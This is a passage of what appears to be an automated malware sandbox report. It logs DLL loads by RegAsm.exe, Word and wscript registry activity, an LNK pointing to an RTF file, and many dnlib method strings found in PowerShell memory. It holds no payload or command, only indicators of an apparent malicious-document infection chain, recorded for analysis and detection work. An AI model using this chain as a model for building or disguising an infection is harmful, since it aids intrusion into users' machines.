                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: nlaapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                Source: 4vzwJTZbwT.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\4vzwJTZbwT.rtf
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
